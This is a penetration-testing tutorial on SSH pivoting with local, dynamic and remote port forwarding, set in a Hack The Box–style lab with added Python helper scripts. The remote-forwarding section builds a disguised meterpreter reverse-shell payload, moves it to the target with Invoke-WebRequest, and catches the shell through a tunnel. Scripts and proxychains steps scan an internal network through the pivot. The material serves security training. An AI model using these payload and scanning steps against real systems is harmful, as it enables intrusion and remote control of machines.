Local Port Forward
Makes a service that is only reachable on the Target Host look local: the SSH client listens on a local port (33306) and carries everything sent there over the SSH connection to a port on the Target Host (3306).
From the Attack Host we cannot reach the MySQL server on the Target Host; only SSH is exposed:
Shelled@htb[/htb]$ nmap -sT -p22,3306 10.129.202.64
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 12:12 EST
Nmap scan report for 10.129.202.64
Host is up (0.12s latency).
PORT STATE SERVICE
22/tcp open ssh
3306/tcp closed mysql
Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
Port 3306 shows as `closed` (the host answered with a RST), which is what we expect when MySQL is bound to the loopback interface only (a firewall that rejects looks the same; one that drops would show `filtered`). To reach the service we can either SSH into the Target Host and run the MySQL client there, or forward it to port `33306` on our localhost and use our own tooling against it.
Shelled@htb[/htb]$ ssh -L 33306:localhost:3306 Target@10.129.202.64
The `-L` option tells the SSH client to listen on port `33306` on the Attack Host (bound to 127.0.0.1 unless told otherwise) and to ask the SSH server to deliver every connection made to it to `localhost:3306`. The destination is resolved on the server side, so `localhost` here is the Target Host's own loopback, and MySQL sees the connection arriving from localhost exactly as a local client's would. Point the MySQL client at 127.0.0.1 port 33306 to use it; the forward lives only as long as the SSH session does.
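Before spending credentials on the forwarded port it is worth confirming that what answers on 127.0.0.1:33306 really is MySQL and seeing what it offers. A MySQL server sends an unsolicited greeting (Protocol::HandshakeV10) on every accepted connection, so the check needs no login. The script below is an added example written for this page, not part of the original notes or of any MySQL tooling; the two packets it parses offline are constructed samples, not captures, and the 10.10.15.6 address in the sample error message is an assumed Attack Host address.

```python
import socket

# Capability bits from the MySQL handshake that matter for this check
# (documented protocol constants).
CLIENT_SSL = 0x0800
CLIENT_SECURE_CONNECTION = 0x8000
CLIENT_PLUGIN_AUTH = 0x00080000


def parse_mysql_greeting(data: bytes) -> dict:
    """Parse a server greeting (HandshakeV10) or a pre-auth ERR packet."""
    if len(data) < 5:
        raise ValueError("too short to be a MySQL packet")
    payload_len = int.from_bytes(data[0:3], "little")  # 3-byte length, 1-byte seq
    payload = data[4:4 + payload_len]
    if len(payload) != payload_len:
        raise ValueError("truncated MySQL packet")
    if payload[0] == 0xFF:
        # ERR instead of a greeting: refused before authentication, typically
        # 1130 "Host ... is not allowed", i.e. we are not seen as localhost.
        return {"error": int.from_bytes(payload[1:3], "little"),
                "message": payload[3:].decode("utf-8", "replace")}
    if payload[0] != 10:
        raise ValueError(f"protocol version {payload[0]}: not a MySQL greeting")
    end = payload.index(b"\x00", 1)
    server_version = payload[1:end].decode("ascii", "replace")
    pos = end + 1
    connection_id = int.from_bytes(payload[pos:pos + 4], "little")
    pos += 4 + 8 + 1                       # skip auth-plugin-data-part-1 and filler
    cap_low = int.from_bytes(payload[pos:pos + 2], "little")
    pos += 2
    charset = payload[pos]
    pos += 1
    status_flags = int.from_bytes(payload[pos:pos + 2], "little")
    pos += 2
    cap_high = int.from_bytes(payload[pos:pos + 2], "little")
    pos += 2
    capabilities = (cap_high << 16) | cap_low
    auth_data_len = payload[pos]
    pos += 1 + 10                          # auth_plugin_data_len + reserved bytes
    if capabilities & CLIENT_SECURE_CONNECTION:
        pos += max(13, auth_data_len - 8)  # auth-plugin-data-part-2
    auth_plugin = None
    if capabilities & CLIENT_PLUGIN_AUTH:
        end = payload.find(b"\x00", pos)
        auth_plugin = payload[pos:end if end != -1 else None].decode("ascii", "replace")
    return {"server_version": server_version, "connection_id": connection_id,
            "charset": charset, "status_flags": status_flags,
            "capabilities": capabilities,
            "tls_offered": bool(capabilities & CLIENT_SSL),
            "auth_plugin": auth_plugin}


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before greeting was complete")
        buf += chunk
    return buf


def probe_forward(host: str = "127.0.0.1", port: int = 33306, timeout: float = 5.0) -> dict:
    """Connect to the local end of the `ssh -L` forward and read the greeting."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        header = _recv_exact(s, 4)
        return parse_mysql_greeting(header + _recv_exact(s, int.from_bytes(header[:3], "little")))


def build_sample_greeting() -> bytes:
    """Constructed sample greeting (not a real capture) for offline testing."""
    caps = CLIENT_SSL | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH | 0x0001
    payload = (bytes([10]) + b"8.0.28-0ubuntu0.20.04.3\x00"
               + (42).to_bytes(4, "little") + b"ABCDEFGH" + b"\x00"
               + (caps & 0xFFFF).to_bytes(2, "little") + bytes([255])
               + (2).to_bytes(2, "little") + (caps >> 16).to_bytes(2, "little")
               + bytes([21]) + b"\x00" * 10 + b"IJKLMNOPQRST\x00"
               + b"caching_sha2_password\x00")
    return len(payload).to_bytes(3, "little") + b"\x00" + payload


def build_sample_err() -> bytes:
    """Constructed pre-auth ERR 1130 packet (not a real capture)."""
    payload = b"\xff" + (1130).to_bytes(2, "little") + \
        b"Host '10.10.15.6' is not allowed to connect to this MySQL server"
    return len(payload).to_bytes(3, "little") + b"\x00" + payload


if __name__ == "__main__":
    print(probe_forward())  # run on the Attack Host while the ssh -L session is up
```

If the forward is working the result names the server version, whether TLS is offered (relevant if credentials will cross the tunnel to a non-loopback destination) and the authentication plugin in use. An `error` of 1130 means the server did not see us as localhost, which points at the destination in the `-L` argument rather than at the credentials.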
Dynamic Port Forwarding
Turns the SSH client into a SOCKS proxy on a local port (4444). Any program pointed at that proxy (for example through proxychains) has its TCP connections carried over SSH and made by the remote host, so we can reach every network that host can reach instead of one fixed port.
We have SSH access to the Target Host (10.129.202.64), which we will use as the pivot. This is the Target Host's network interface information:
ubuntu@WEB01:~$ ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.202.64 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb9:52eb prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:52eb prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:52:eb txqueuelen 1000 (Ethernet)
RX packets 35571 bytes 177919049 (177.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10452 bytes 1474767 (1.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.5.129 netmask 255.255.254.0 broadcast 172.16.5.255
inet6 fe80::250:56ff:feb9:a9aa prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:a9:aa txqueuelen 1000 (Ethernet)
RX packets 8251 bytes 1125190 (1.1 MB)
RX errors 0 dropped 40 overruns 0 frame 0
TX packets 1538 bytes 123584 (123.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 270 bytes 22432 (22.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 270 bytes 22432 (22.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
The second interface, ens224, puts the host on 172.16.4.0/23 (172.16.5.129/23), a network the Attack Host has no route to. To scan it we open an SSH session to the pivot with `-D`, which makes the SSH client listen as a SOCKS proxy on local port 4444 and build a new tunneled connection from the pivot for every connection the proxy receives. Nothing has to be configured on the server beyond `AllowTcpForwarding` not being disabled in sshd.
Shelled@htb[/htb]$ ssh -D 4444 ubuntu@10.129.202.64
To make proxychains send its traffic through port 4444, edit `/etc/proxychains.conf` (`/etc/proxychains4.conf` on newer proxychains-ng builds) and put `socks4 127.0.0.1 4444` on the last line, replacing the default Tor entry `socks4 127.0.0.1 9050` if it is there.
Shelled@htb[/htb]$ tail -4 /etc/proxychains.conf
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 4444
Only TCP connections can be carried through a SOCKS proxy, so ICMP pings, raw SYN scans (`-sS`) and UDP are never proxied: for port scanning use full-connect scans (`-sT`) with `-Pn`, and an unprivileged ping scan like the one below is really a TCP connect to ports 80 and 443 on each host (the "2 ports/host" in the output), which is slow and noisy through the tunnel.
Shelled@htb[/htb]$ proxychains nmap -v -sn 172.16.5.1-200
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 12:30 EST
Initiating Ping Scan at 12:30
Scanning 10 hosts [2 ports/host]
|S-chain|-<>-127.0.0.1:4444-<><>-172.16.5.2:80-<--timeout
|S-chain|-<>-127.0.0.1:4444-<><>-172.16.5.5:80-<><>-OK
|S-chain|-<>-127.0.0.1:4444-<><>-172.16.5.6:80-<--timeout
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
<SNIP>
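What proxychains does for each of those lines is a plain SOCKS4 exchange with the `ssh -D` listener: a 9-byte CONNECT request naming the destination, then an 8-byte reply. Doing it by hand makes the behaviour of the tunnel visible and gives a scanner that works through the pivot without relying on LD_PRELOAD hooking. The script below is an added example written for this page, not part of the original notes, of proxychains or of OpenSSH; it assumes the proxy at 127.0.0.1:4444 from the command above and the 172.16.5.1-200 range from the scan, and the request and reply bytes in the test are constructed.

```python
import socket
import struct

SOCKS4_VERSION = 0x04
SOCKS4_CMD_CONNECT = 0x01
SOCKS4_REPLY_CODES = {
    0x5A: "granted",
    0x5B: "rejected or failed",
    0x5C: "rejected: identd unreachable",
    0x5D: "rejected: identd user mismatch",
}


def build_socks4_connect(dst_ip: str, dst_port: int, userid: bytes = b"") -> bytes:
    """SOCKS4 CONNECT request: VN, CD, DSTPORT (big-endian), DSTIP, USERID, NUL.
    SOCKS4 carries only an IPv4 literal, so a hostname would be resolved on the
    Attack Host, outside the tunnel (proxychains' proxy_dns / SOCKS4a avoid that)."""
    return (struct.pack("!BBH", SOCKS4_VERSION, SOCKS4_CMD_CONNECT, dst_port)
            + socket.inet_aton(dst_ip) + userid + b"\x00")


def parse_socks4_reply(data: bytes) -> dict:
    """Decode the 8-byte SOCKS4 reply: VN (always 0), CD, DSTPORT, DSTIP."""
    if len(data) != 8:
        raise ValueError(f"SOCKS4 reply must be 8 bytes, got {len(data)}")
    vn, cd, port = struct.unpack("!BBH", data[:4])
    if vn != 0:
        raise ValueError(f"not a SOCKS4 reply (VN={vn})")
    return {"granted": cd == 0x5A, "code": cd,
            "status": SOCKS4_REPLY_CODES.get(cd, "unknown"),
            "port": port, "ip": socket.inet_ntoa(data[4:8])}


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def socks4_connect(proxy, dst_ip: str, dst_port: int, timeout: float = 5.0):
    """Open a TCP connection to dst_ip:dst_port through the SOCKS4 proxy.
    Returns (socket, 'open') on success, else (None, reason). In practice with
    OpenSSH's -D the reply only arrives once the pivot's own connect succeeded;
    a destination the pivot cannot reach shows up as the proxy closing our
    socket (or a read timeout), not as a 0x5B code."""
    try:
        s = socket.create_connection(proxy, timeout=timeout)
    except OSError as e:
        return None, f"proxy unreachable: {e}"
    try:
        s.sendall(build_socks4_connect(dst_ip, dst_port))
        reply = parse_socks4_reply(_recv_exact(s, 8))
    except socket.timeout:
        s.close()
        return None, "timeout"
    except (ConnectionError, OSError):
        s.close()
        return None, "closed-by-proxy"
    except ValueError as e:
        s.close()
        return None, f"bad reply: {e}"
    if not reply["granted"]:
        s.close()
        return None, reply["status"]
    return s, "open"


def tcp_discover(proxy, hosts, ports=(80, 443), timeout: float = 3.0) -> dict:
    """Host discovery the way an unprivileged `proxychains nmap -sn` does it:
    a TCP connect to 80 and 443 per host through the proxy. ICMP echo, raw
    SYN (-sS) and UDP never enter a SOCKS tunnel, so they cannot be used here."""
    results = {}
    for host in hosts:
        results[host] = "down"
        for port in ports:
            sock, status = socks4_connect(proxy, host, port, timeout)
            if sock is not None:
                sock.close()
                results[host] = "up"
                break
    return results


if __name__ == "__main__":
    proxy = ("127.0.0.1", 4444)                       # the `ssh -D 4444` listener
    targets = [f"172.16.5.{i}" for i in range(1, 201)]
    for host, state in tcp_discover(proxy, targets).items():
        if state == "up":
            print(host, state)
```

Because each probe is a full TCP connect made by the pivot, every attempt is logged on the target like any other connection from 172.16.5.129; keep the port list short and the timeouts generous, since each "timeout" line in the proxychains output above is a pivot-side connect that never completed.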
Remote Port Forwarding
Lets a host two hops away, one that can reach only the Pivot Host, connect back to a listener on our Attack Host: the Pivot Host listens on a port (8888) and hands every connection it receives over the SSH tunnel to a local port on the Attack Host (4444). Traffic flows from the Target Host to the Pivot Host and on to us, the opposite direction of the `-L` forward above. Here we use it to catch a reverse shell.
Create the reverse shell payload that will run on the Target Host. Its LHOST is the Pivot Host's internal address (172.16.5.129 here), because that is the only address the Target Host can reach, and LPORT 8888 is the port the Pivot Host will be listening on:
Shelled@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> LPORT=8888 -f exe -o backupscript.exe
Start the handler on the Attack Host. It must use the same payload and bind to port 4444, the local port the remote forward will deliver connections to (not 8888, which exists only on the Pivot Host): after `use exploit/multi/handler`, `set payload windows/x64/meterpreter/reverse_https`, `set LHOST 0.0.0.0`, `set LPORT 4444` and `run`.
msf6 > use exploit/multi/handler
Transfer the payload from the Attack Host to the Pivot Host:
Shelled@htb[/htb]$ scp backupscript.exe ubuntu@<ipAddressofPivotHost>:~/
Transfer payload from Pivot Host to Target Host (1)
ubuntu@Webserver$ python3 -m http.server 8123
Transfer payload from Pivot Host to Target Host (2)
PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
Now set up the remote forward: the Pivot Host listens on port 8888 on its internal interface and forwards every incoming connection through the SSH tunnel to port 4444 on the Attack Host. `-N` opens no shell (the session exists only for the forward) and `-v` prints the forwarding requests as they are set up, which is how we see whether the bind succeeded. By default sshd binds remote forwards to the loopback interface only and ignores the bind address we ask for, so for the Target Host to reach port 8888 the Pivot Host's sshd_config needs `GatewayPorts yes` or `GatewayPorts clientspecified`; check which address port 8888 is bound to on the Pivot Host before running the payload on the Target Host.
Shelled@htb[/htb]$ ssh -R <InternalIPofPivotHost>:8888:0.0.0.0:4444 ubuntu@<ipAddressofPivotHost> -vN
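The failure mode to check for is a listener that exists but sits on 127.0.0.1 of the Pivot Host, where the Target Host can never reach it. The script below is an added example for this page, not part of the original notes; it decides from `ss -tln` output, as captured on the Pivot Host, whether a given Target Host address can reach the `-R` listener. Both `ss` outputs embedded in it are constructed samples (the first is what a default `GatewayPorts no` sshd produces, the second the intended bind), the Pivot Host interfaces are taken from the ifconfig output above, and 172.16.5.25 is an assumed Target Host address.

```python
import ipaddress

# Constructed `ss -tln` samples from the Pivot Host (not real captures).
# 1) sshd left at GatewayPorts no: the requested bind address was ignored
#    and the forward landed on loopback.
SS_LOOPBACK_ONLY = """\
State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port
LISTEN  0       128            0.0.0.0:22           0.0.0.0:*
LISTEN  0       128          127.0.0.1:8888         0.0.0.0:*
LISTEN  0       128               [::]:22              [::]:*
"""
# 2) GatewayPorts clientspecified (or yes): bound where we asked.
SS_BOUND_INTERNAL = """\
State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port
LISTEN  0       128            0.0.0.0:22           0.0.0.0:*
LISTEN  0       128       172.16.5.129:8888         0.0.0.0:*
LISTEN  0       128               [::]:22              [::]:*
"""
# Pivot Host interfaces from the ifconfig output (address/prefix).
PIVOT_INTERFACES = ["10.129.202.64/16", "172.16.5.129/23"]


def listen_addresses(ss_output: str, port: int) -> list:
    """Local addresses on which `port` is in LISTEN state, from `ss -tln` text."""
    found = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, _, p = fields[3].rpartition(":")       # handles "[::]:22" too
        if p.isdigit() and int(p) == port:
            found.append("0.0.0.0" if addr == "*" else addr.strip("[]"))
    return found


def forward_status(ss_output: str, port: int, client_ip: str, pivot_interfaces) -> str:
    """Can a host at client_ip reach the -R listener on the Pivot Host?
    Returns 'not-listening', 'loopback-only', 'bound-off-link' or 'reachable'."""
    addrs = listen_addresses(ss_output, port)
    if not addrs:
        return "not-listening"
    client = ipaddress.ip_address(client_ip)
    ifaces = [ipaddress.ip_interface(i) for i in pivot_interfaces]
    on_link = [i for i in ifaces if client in i.network]   # pivot interfaces the client can reach
    for a in addrs:
        bound = ipaddress.ip_address(a)
        if bound.is_loopback or bound.version != client.version:
            continue
        if bound.is_unspecified and on_link:                # 0.0.0.0 / :: covers every interface
            return "reachable"
        if any(bound == i.ip for i in on_link):
            return "reachable"
    if all(ipaddress.ip_address(a).is_loopback for a in addrs):
        return "loopback-only"
    return "bound-off-link"


if __name__ == "__main__":
    import sys
    # Usage: ss -tln | python3 check_rforward.py 8888 172.16.5.25
    port, client = int(sys.argv[1]), sys.argv[2]
    print(forward_status(sys.stdin.read(), port, client, PIVOT_INTERFACES))
```

A `loopback-only` result means the payload will run on the Target Host and simply fail to connect; fix `GatewayPorts` on the Pivot Host (or, where that is not possible, bind to the loopback on purpose and use a separate relay such as a socat listener on the Pivot Host) before re-running it. `bound-off-link` means the listener is on a Pivot Host interface the Target Host is not attached to, so the bind address in the `-R` argument is wrong.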